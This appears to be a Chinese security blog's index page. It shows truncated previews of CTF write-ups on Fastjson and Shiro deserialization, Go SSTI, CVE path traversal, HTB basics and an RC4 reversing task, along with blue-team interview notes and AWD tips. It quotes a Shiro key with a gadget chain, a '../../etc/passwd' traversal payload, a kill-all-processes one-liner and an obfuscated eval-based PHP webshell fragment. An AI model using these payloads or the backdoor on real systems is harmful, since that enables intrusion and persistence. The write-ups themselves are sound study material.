2024长城杯wp
2024长城杯wpAWD:
Awd只攻击了DocToolkit
利用工具
key是QZIysgMYhG7/CzIJlVpR1g==
利用链是CommonsBeanutils1
攻击之后cat /flag即可
ISWsingle02-flag01http://8.130.45.157/
扫描目录的得到backup.zip
访问解压得到流量包,流量包导出文件发现flag.zip
猜测密码得到123456得到flag
flag{FF0A6350-56C2-4F45-12C6-FDE9388A74E6}
single02-flag02导出的文件中role%3fpageSize=10&pageNum=1&发现flag
flag{3B8E0FF4-3175-1230-9557-C47BCAB9693E}
HZNUCTF 2023 Final Ezjava
[HZNUCTF 2023 final]ezjava高版本的Fastjson,和chu0师傅讨论Fastjson的时候,在网上找寻LDAP相关问题,看到这个题的解决办法刚好解决了困惑,顺便把这个题目也做了。
解题过程
开题提示Fastjson:1.2.48
加上开局的Try to fxxk it ( Log4j
最开始很容易想到是log4j,奈何我太菜,还没学到log4j就做了Fastjson的做法
提示了我们fastjson版本为1.2.48,可以利用1.2.48的exp打或者直接用1.2.83的全版本原生反序列化利用
exp生成
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263import com.alibaba.fastjson.JSONArray;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;imp ...
记第一次做Java反序列化题目
记第一次做Java反序列化题目前言chu0佬发了个题目,说最近刚学完fastjson,来试试,(这个被我鸽了好久了,抓紧来看看)本人刚刚学完fastjson,现在来试试。
题目本地起个环境
1java -jar Login.jar
访问IP:8081
反编译看看源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354package BOOT-INF.classes.com.ctf.controller;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.JSONObject;import com.alibaba.fastjson.parser.ParserConfig;import com.ctf.entity.User;import java.nio.charset.StandardCharsets;import java.util.Base64;import j ...
2024HZNU
WebezSSTIgo的ssti
1234567891011121314151617181920212223242526272829303132333435363738394041package mainimport ( "fmt" "net/http" "os/exec" "strings" "text/template")type User struct { Id int Name string Passwd string}func (u User) Eval(command string) string { out, _ := exec.Command(command).CombinedOutput() return string(out)}func Login(w http.ResponseWriter, r *http.Request) { r.ParseForm() username := strings.Join ...
春秋云镜题目练习
春秋云镜合集CVE-2023-27179GDidees CMS
靶标介绍:
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用
根据题目描述直接访问/_admin/imgdownload.php并尝试读取../../../../../etc/passwd
发现会下载一个png文件
跟随这样,访问/_admin/imgdownload.php?filename=../../../../../flag得到flag
CVE-2023-26469
靶标介绍:
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执 ...
记第一次HTB之旅
记第一次HTB之旅前言截止目前,这还是一次失败的htb之旅,发生了一些奇奇怪怪的的问题,待我慢慢解决,渗透的大门也不是那么好进的
HTB靶机渗透之headless
1sudo openvpn lab_name.ovpn
连上vpn
出现Initialization Sequence Completed才算链接成功
第一关Meow
首字母缩略词 VM 代表什么?**
virtual machine
我们使用什么工具与操作系统交互以便通过命令行发出命令,例如启动我们的 VPN 连接的工具?它也被称为控制台或外壳。
termina
我们使用什么服务来建立与 HTB 实验室的 VPN 连接?
openvpn 送分题
4.VPN启动序列输出中“隧道接口”的缩写名称是什么?
tun
5.我们使用什么工具通过 ICMP 回显请求测试与目标的连接
ping*
6.在目标上查找开放端口的最常用工具的名称是什么?
Nmap
7.在扫描过程中,我们在端口 23/tcp 上识别出什么服务?
telnet
8.什么用户名可以使用空密码通过 telnet 登录目标?
rooT
Telne ...
FastJson反序列化漏洞学习
FastJson反序列化漏洞学习附言文章借鉴:http://xz.aliyun.com/t/13386
https://www.cnblogs.com/Aurora-M/p/15683941.html
视频跟寻:B站白日梦组长
新建依赖导入fastjson
直接贴漏洞成因了,不搞其他的了
fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制会调用指定类中的setter方法及部分getter方法,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有gadget,则会造成一些严重的安全问题。
先新建一个Person类当做json调用测试来用
12345678910111213141516171819202122232425262728293031public class Person { public int age; public String name; ...
2024数信杯wp
2024数信杯Magic AudioSSTV解密后,binwalk分离出压缩包,将“菜就多练”输入后得到flag文件
rrrrccccupx去壳后打开程序,分析就是两次异或,一次rc4一次异或key,我patch密文让他异或rc4后,手动异或一下key即可
123456789101112131415a = [ 0x57, 0x68, 0x61, 0x74, 0x61, 0x72, 0x65, 0x79, 0x6F, 0x75, 0x72, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x26, 0x64, 0x65, 0x63, 0x72, 0x79, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x62, 0x61, 0x73, 0x69, 0x63, 0x73]b = [ 0x31, 0x04, 0x00, 0x13, 0x1A, 0x16, 0x56, 0x1D, 0x0D, 0x43, 0x4B, 0x04, 0x5D, 0x57, 0x13, 0x4C, 0x41, 0 ...
HW知识学习
师傅好
我是xxx,今天面试蓝初,我主要掌握一些 Top 10漏洞 了解一些流量特征
之前有过一次护网经历
主要是 进行一些 告警信息处理
在之前的护网期间,有一次我们的服务器遭到了攻击,我们立即展开应急响应工作,我们首先做的是向攻击者的IP范围加入防火墙,限制恶意流量进入服务器,当时我们的服务器已经接收到了一部分恶意流量,我们当时选择了丢弃,因为我们不能让其影响服务器的带宽和处理能力,然后我们在服务器上查看进程信息,发现恶意进程后,我们也是第一时间关闭了恶意进程,我们也删除了攻击者留下的恶意文件,因为攻击者是利用我们服务器的一些安全漏洞从而攻击我们的服务器,所以我们也是给服务器做了安全修复并且也打了补丁,最后我们维护日志文件并进行调查,在确定了攻击方式、攻击目的和攻击来源后,向研判进行汇报。
非关键业务,先隔离网络,通过请求路径查找相关的webshell文件,通过webshell文件排查相关日志,最后修补漏洞
在排查⼀台服务器被攻击后,需要采取快速⽽有针对性的措施,并结合具体情况进⾏分析和修复,以保护系统和敏感数据的安全性。
OWASP TOP 10漏洞
注入漏洞(Injectio ...
初学AWD 心得
AWD 心得这是比赛前临时拷贝的一篇文章,已经找不到文章里,如侵请联系我删除,抱歉
这里将这个放到杀不死马的脚本里,杀死该用户下的所有进程,确定好用户名
1ps aux | grep www-data | awk '{print $2}' | xargs kill -9
这里写一个自动化的脚本会在比赛中更快一点
快速修站1scp -r html/ root@ip:/var/www/html/
快速备份1scp -r root@ip:/var/www/html/ `pwd`
比赛方放的后门:比赛方放的后门:12345<?php file_put_contents('./.config.php', '<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(9 ...